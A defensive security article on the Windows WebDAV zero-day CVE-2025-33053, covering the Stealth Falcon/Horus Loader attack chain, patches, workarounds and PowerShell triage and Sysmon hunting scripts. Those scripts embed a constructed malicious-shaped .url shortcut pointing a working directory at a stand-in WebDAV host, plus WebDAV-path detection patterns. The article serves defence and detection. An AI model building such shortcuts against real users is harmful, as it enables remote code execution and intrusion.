
"WebDAV Zero-Day" Affects All Windows Systems: The Dangers of CVE-2025-33053 and Immediate Countermeasures [Comprehensive Guide]


June 11, 2025, 17:57

1. Introduction

On June 10, 2025 (early morning of June 11, Japan time), Microsoft released its monthly Patch Tuesday update addressing 66 vulnerabilities. The only one marked as already exploited in the wild was the WebDAV vulnerability CVE-2025-33053 (techtarget.com, bleepingcomputer.com).



WebDAV is an HTTP extension that has long been used for file sharing and groupware. In recent years it has been built into cloud storage and backup products, and it remains in use in many corporate systems. This article explains the technical details of the vulnerability and the practical countermeasures.




2. What is WebDAV? — History and Uses

WebDAV (Web Distributed Authoring and Versioning) is a protocol that extends HTTP so that files on a web server can be created, moved, locked and versioned remotely. It was first standardized in the late 1990s (RFC 2518, 1999) and revised as RFC 4918 in 2007, and Exchange Server 2003 and earlier used it as a mailbox access method. Today it is used for



  • on-premises and cloud file sharing

  • version control in document management systems (DMS)

  • repositories for backup appliances

  • data synchronization for mobile apps

  among other applications (securitybrief.co.nz).




3. Overview of Vulnerability CVE-2025-33053

Item                 Details
CVE number           CVE-2025-33053
Severity             CVSS 8.8, rated Important by Microsoft
Type                 Remote Code Execution (RCE)
Affected component   The WebDAV client path in Windows itself (Windows 10/11 and supported Windows Server editions); IIS, Apache, Nginx and other WebDAV servers are only the hosting the attacker uses, not the vulnerable component
Condition            A user opens a specially crafted .url shortcut (or WebDAV URL) whose working directory points at an attacker-controlled WebDAV server
Exploitation status  Targeted attacks by the APT group "Stealth Falcon" confirmed
Mitigation           Install the June 2025 update; as an interim workaround, stop and disable the WebClient service




The flaw lies in how Windows resolves a WebDAV working directory: a legitimate, signed Windows program can be launched with its working directory pointing at an attacker-controlled WebDAV server, and helper executables it starts by name are then loaded from that server instead of from the local system (research.checkpoint.com).
A user is infected simply by opening a shortcut that calls a legitimate diagnostic tool such as iediagcmd.exe; the rest of the intrusion chain proceeds in the background.




4. Attack Chain and "Stealth Falcon" Case

In March 2025, Check Point Research analyzed a spear-phishing attempt against a Turkish defense company and found a previously undocumented loader, Horus Loader, delivered through this vulnerability. The attack flow is as follows (research.checkpoint.com).


  1. A spear-phishing email arrives with a .url (Internet Shortcut) file attached.

  2. Opening the shortcut launches a legitimate Windows tool with its WorkingDirectory set to the attacker's WebDAV server.

  3. The tool starts helper programs by bare name, so route.exe is resolved from that working directory and the attacker's disguised route.exe on the WebDAV server runs instead of the system copy.

  4. That binary, Horus Loader, performs multi-stage decoding and injects Horus Agent into the Edge process.

  5. Horus Agent communicates with its C2 server to steal information and deploy additional payloads.


Stealth Falcon is an APT group that has targeted government and defense organizations in the Middle East and North Africa for years, and it is reported to have a long history of buying zero-days and operating custom malware.
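The .url shortcut that starts this chain is a plain INI-format Internet Shortcut, so it can be triaged without ever opening it. The PowerShell below is an added example written for this article, not code from the original page or from Check Point Research. It parses a shortcut, flags a WorkingDirectory (or IconFile) that resolves to a remote WebDAV location in the form the WebClient service understands (\\host@SSL@443\DavWWWRoot\... or a bare http(s) URL) while URL= launches a local program, and can be pointed at a mail quarantine or user profile. The host name webdav.example, the share name, the iediagcmd.exe path and the shortcut contents are constructed for the example; the real Stealth Falcon shortcut is not reproduced.

```powershell
# Added example: inspect Internet Shortcut (.url) files for the "remote WebDAV
# working directory" pattern used in the CVE-2025-33053 chain.
# Not code from the original article or from Check Point Research.

function Read-InternetShortcut {
    # Minimal INI reader: returns the key/value pairs of the [InternetShortcut] section.
    param([Parameter(Mandatory)][string]$Content)
    $keys = @{}
    $inSection = $false
    foreach ($raw in ($Content -split "`r?`n")) {
        $line = $raw.Trim()
        if ($line -eq '' -or $line.StartsWith(';')) { continue }
        if ($line -match '^\[(.+)\]$') {
            $inSection = ($Matches[1] -eq 'InternetShortcut')
            continue
        }
        if ($inSection -and $line -match '^([^=]+)=(.*)$') {
            $keys[$Matches[1].Trim()] = $Matches[2].Trim()
        }
    }
    return $keys
}

function Test-WebDavLocation {
    # True for paths the WebClient service would fetch over HTTP(S):
    #   \\host@SSL@443\DavWWWRoot\...   \\host@8080\...   \\host\DavWWWRoot\...   http(s)://...
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path)) { return $false }
    return ($Path -match '^\\\\[^\\]+@(SSL|\d+)' -or
            $Path -match '^\\\\[^\\]+\\DavWWWRoot(\\|$)' -or
            $Path -match '^https?://')
}

function Get-UrlShortcutVerdict {
    # Classifies one shortcut: High when the working directory is remote (the exact
    # precondition the vulnerability needs), Medium for the other warning signs.
    param([Parameter(Mandatory)][string]$Content, [string]$Source = '<inline>')
    $k = Read-InternetShortcut -Content $Content
    $findings = @()
    $wdRemote = Test-WebDavLocation $k['WorkingDirectory']
    if ($wdRemote) { $findings += 'WorkingDirectory resolves to a remote WebDAV share' }
    if ($k['URL'] -match '^file:' -or $k['URL'] -match '^[A-Za-z]:\\') {
        $findings += 'URL launches a local program instead of opening a web page'
    }
    if (Test-WebDavLocation $k['IconFile']) {
        $findings += 'IconFile is fetched from a remote server when the shortcut is rendered'
    }
    $risk = 'Low'
    if ($findings.Count -gt 0) { $risk = 'Medium' }
    if ($wdRemote) { $risk = 'High' }
    [pscustomobject]@{
        Source           = $Source
        URL              = $k['URL']
        WorkingDirectory = $k['WorkingDirectory']
        Risk             = $risk
        Findings         = $findings
    }
}

function Find-SuspiciousUrlShortcuts {
    # Scans a directory tree (e.g. a mail quarantine or a user profile) for risky .url files.
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -Filter '*.url' -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $c = Get-Content -LiteralPath $_.FullName -Raw -ErrorAction SilentlyContinue
            if ($c) { Get-UrlShortcutVerdict -Content $c -Source $_.FullName }
        } |
        Where-Object { $_.Risk -ne 'Low' }
}

# Constructed sample shaped like the shortcut described above. Host, share and
# program path are assumptions for the example, not the real attacker's values.
$sample = @'
[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\webdav.example@SSL@443\DavWWWRoot\docs
IconFile=\\webdav.example@SSL@443\DavWWWRoot\docs\report.ico
IconIndex=0
'@
Get-UrlShortcutVerdict -Content $sample -Source 'constructed-sample.url' | Format-List
```

A High verdict means the shortcut would hand whatever URL= launches a working directory on a remote server, which is exactly what the exploit needs; blocking .url attachments at the gateway (section 8) stops most of this up front, and this check is for triaging what got through or what users already have on disk.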




5. Affected Products and Versions

  • Windows client: Windows 10 (including 22H2) and Windows 11 (including 23H2 and 24H2), i.e. all supported versions

  • Windows Server: Server 2016/2019/2022/2025, plus older editions still under Extended Security Updates such as Server 2012 R2 (see section 7)

  • Not the vulnerable component: IIS with the WebDAV extension, Apache mod_dav, Nginx WebDAV modules, SabreDAV and other server-side implementations, and WebDAV-based cloud storage such as Nextcloud and ownCloud. The bug is in the Windows client path; in this attack a WebDAV server is simply where the attacker hosts the payload.
    Microsoft published fixes through MSRC on June 10, 2025, and CISA added CVE-2025-33053 to its Known Exploited Vulnerabilities (KEV) catalog the same day (cisa.gov, crowdstrike.com).




6. Exploitation Status and Zero-Day Background

As TechTarget and BleepingComputer report, CVE-2025-33053 was exploited in the wild before the patch was released, and because the payload runs after a single click on a shortcut, many practitioners treat it as critical even though Microsoft's severity rating is Important (techtarget.com, bleepingcomputer.com).
According to SecurityBrief, the last WebDAV-related zero-day Microsoft disclosed was in 2018, making this the first in about seven years (securitybrief.co.nz).




7. Details and Application Procedure of Microsoft's Patch

  • Windows Update/WSUS/MECM: included in the June 2025 cumulative updates (for example KB5060999 for Windows 11 22H2/23H2; other editions have their own KB numbers)

  • Security-only update route (for example Server 2012 R2 under ESU): both the OS security-only update and the separate IE (MSHTML) cumulative update must be installed

  • Reboot requirement: a system reboot is required after applying the update
    To confirm installation, compare the OS build shown by winver with the build listed in the KB release notes, or check for the KB number with Get-HotFix (wmic qfe list still works but WMIC is deprecated). If the WebClient service was only stopped by hand as a workaround, nothing enforces that state and a trigger start or an administrator can bring it back, so pin the startup type to Disabled with Group Policy (techtarget.com, rapid7.com).




8. Immediate Workarounds You Can Do Now

  1. Stop and disable the WebClient service

    ```powershell
    Stop-Service -Name WebClient
    Set-Service -Name WebClient -StartupType Disabled
    ```

    WebClient is the WebDAV redirector. With it disabled, Windows can no longer open \\host@SSL@443\DavWWWRoot-style paths, so a shortcut that points its working directory at a remote WebDAV server fails instead of fetching the attacker's binary. This is a workaround, not a fix: mapped WebDAV drives and applications that rely on them stop working, and the update still has to be installed (rapid7.com).

  2. Disable unneeded WebDAV modules on IIS/Apache/Nginx (general attack-surface reduction; this does not address the client-side bug itself)

  3. Block .url attachments on SMTP gateways

  4. With EDR, monitor legitimate Windows binaries such as iediagcmd.exe spawning child processes (route.exe and similar) whose image path or working directory is a WebDAV share

  5. Prevent access to external WebDAV shares through Group Policy (for example by disabling the WebClient service fleet-wide)

  6. Hunt for Indicators of Compromise (IoC)

    • Access to WebDAV paths of the form \\<host>@SSL@443\DavWWWRoot\* in proxy, firewall and endpoint logs (plain-HTTP variants such as \\<host>@80\ or \\<host>\DavWWWRoot\ as well)

    • Horus Loader samples, which Check Point reports are protected with the Code Virtualizer packer
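Items 4 and 6 above describe a hunt that can be expressed as a query over process-creation telemetry. The following is an added PowerShell example written for this article, not code from the original page or from Check Point Research: it reads Sysmon Event ID 1 records by field name (so Sysmon schema changes do not break it), flags a new process whose image or current directory lives on a WebDAV path (the @SSL@443 UNC form, a DavWWWRoot path, or the local WebClient cache under TfsStore\Tfs_DAV), and treats iediagcmd.exe as the parent of interest. The sample event, the host webdav.example and the command line are constructed; the live query needs Sysmon installed and read access to its log.

```powershell
# Added example: hunt for the CVE-2025-33053 execution pattern in Sysmon process
# creation events (Event ID 1). Not code from the original article or Check Point.
# The sample event below is constructed; host and path names are placeholders.

function ConvertFrom-SysmonEvent {
    # Extracts <Data Name="...">value</Data> pairs from an event rendered as XML,
    # so differences in field order between Sysmon schema versions do not matter.
    param([Parameter(Mandatory)][string]$EventXml)
    $x = [xml]$EventXml
    $fields = @{}
    foreach ($d in $x.Event.EventData.Data) { $fields[$d.GetAttribute('Name')] = $d.InnerText }
    return $fields
}

# Places where the WebClient redirector materialises remote files:
#   \\host@SSL@443\DavWWWRoot\...   UNC form of an https WebDAV URL
#   \\host\DavWWWRoot\...            plain-http form
#   ...\TfsStore\Tfs_DAV\...         local WebClient cache under the LocalService profile
$WebDavPattern = '^\\\\[^\\]+@(SSL|\d+)|\\DavWWWRoot(\\|$)|\\TfsStore\\Tfs_DAV\\'

function Test-WebDavProcessLaunch {
    # Verdict for one process-creation record. Suspicious when the new process image is
    # on WebDAV, or when the parent is the diagnostic tool from the attack chain and the
    # child's current directory is on WebDAV.
    param([Parameter(Mandatory)][hashtable]$Fields)
    $imageRemote  = $Fields['Image']            -match $WebDavPattern
    $cwdRemote    = $Fields['CurrentDirectory'] -match $WebDavPattern
    $parentLolbin = $Fields['ParentImage']      -match '\\iediagcmd\.exe$'
    [pscustomobject]@{
        Time        = $Fields['UtcTime']
        Image       = $Fields['Image']
        Parent      = $Fields['ParentImage']
        Cwd         = $Fields['CurrentDirectory']
        ImageRemote = $imageRemote
        CwdRemote   = $cwdRemote
        Suspicious  = ($imageRemote -or ($parentLolbin -and $cwdRemote))
    }
}

function Find-WebDavLaunches {
    # Live query against the local Sysmon log (requires Sysmon and read access to the log).
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents |
        ForEach-Object { Test-WebDavProcessLaunch -Fields (ConvertFrom-SysmonEvent -EventXml $_.ToXml()) } |
        Where-Object Suspicious
}

# Constructed sample: route.exe resolved from the attacker's share because
# iediagcmd.exe was started with that share as its working directory.
$sampleXml = @'
<Event>
  <System><EventID>1</EventID></System>
  <EventData>
    <Data Name="UtcTime">2025-06-11 02:14:07.123</Data>
    <Data Name="Image">\\webdav.example@SSL@443\DavWWWRoot\docs\route.exe</Data>
    <Data Name="CommandLine">route</Data>
    <Data Name="CurrentDirectory">\\webdav.example@SSL@443\DavWWWRoot\docs\</Data>
    <Data Name="ParentImage">C:\Program Files\Internet Explorer\iediagcmd.exe</Data>
  </EventData>
</Event>
'@
Test-WebDavProcessLaunch -Fields (ConvertFrom-SysmonEvent -EventXml $sampleXml) | Format-List
```

The ImageRemote test on its own catches any executable started from a WebDAV location, which is rare in normal use and worth an alert regardless of parent; the parent-plus-working-directory test is there for the case where the child image is recorded under its cache path or a name you did not anticipate.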




9. Security enhancement points required in the medium to long term

  • Protocol inventory: find where WebDAV is still relied on and move to modern alternatives such as SMB over QUIC or an S3-style object storage API

  • Least privilege: place file-sharing servers in segmented networks and unify authentication on OAuth 2.0/OpenID Connect

  • Gateway architecture: front sharing functions with a gateway so individual services are not exposed directly

  • Shorter vulnerability-management cycle: detect and fix unpatched devices within 48 hours using an asset inventory and continuous scanning

  • Security exercises: run WebDAV-based intrusion scenarios with DevSecOps teams to verify response capabilities

  • Automated IoC sharing: propagate Horus Agent hashes and C2 lists inside and outside the organization in near real time using MISP/TAXII




10. Conclusion and Future Outlook

CVE-2025-33053 has once again shown that zero-days can surface in old protocols. Even companies that do not use WebDAV directly may have cloud storage or backup devices relying on it in the background. In addition to installing Microsoft's update, it is important to put effective interim defenses in place immediately, such as disabling the WebClient service and monitoring logs. In the long term, retiring legacy protocols and moving toward zero trust is essential. Because the impact is broad, public PoC code and variant attacks are expected, so keep watching official advisories and threat intelligence (golem.de, bleepingcomputer.com).







Reference Article List

  • Golem.de, "Nutzer gefährdet: WebDAV-Lücke in Windows wird aktiv ausgenutzt" (Users at risk: WebDAV hole in Windows is being actively exploited), 2025-06-10, golem.de

  • TechTarget, "June Patch Tuesday resolves Windows zero-day", 2025-06-10, techtarget.com

  • Check Point Research, "CVE-2025-33053, Stealth Falcon and Horus: A Saga of Middle Eastern Cyber Espionage", 2025-06-10, research.checkpoint.com

  • BleepingComputer, "Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws", 2025-06-10, bleepingcomputer.com

  • CISA, "Known Exploited Vulnerabilities Catalog – CVE-2025-33053", 2025-06-10, cisa.gov

  • Rapid7 Blog, "Patch Tuesday – June 2025", 2025-06-10, rapid7.com

  • Tenable Blog, "Microsoft's June 2025 Patch Tuesday addresses 65 CVEs", 2025-06-10, tenable.com



Source article (German original): Golem.de, "Users at Risk: WebDAV Vulnerability in Windows Actively Exploited"
https://www.golem.de/news/nutzer-gefaehrdet-webdav-luecke-in-windows-wird-aktiv-ausgenutzt-2506-197011.html
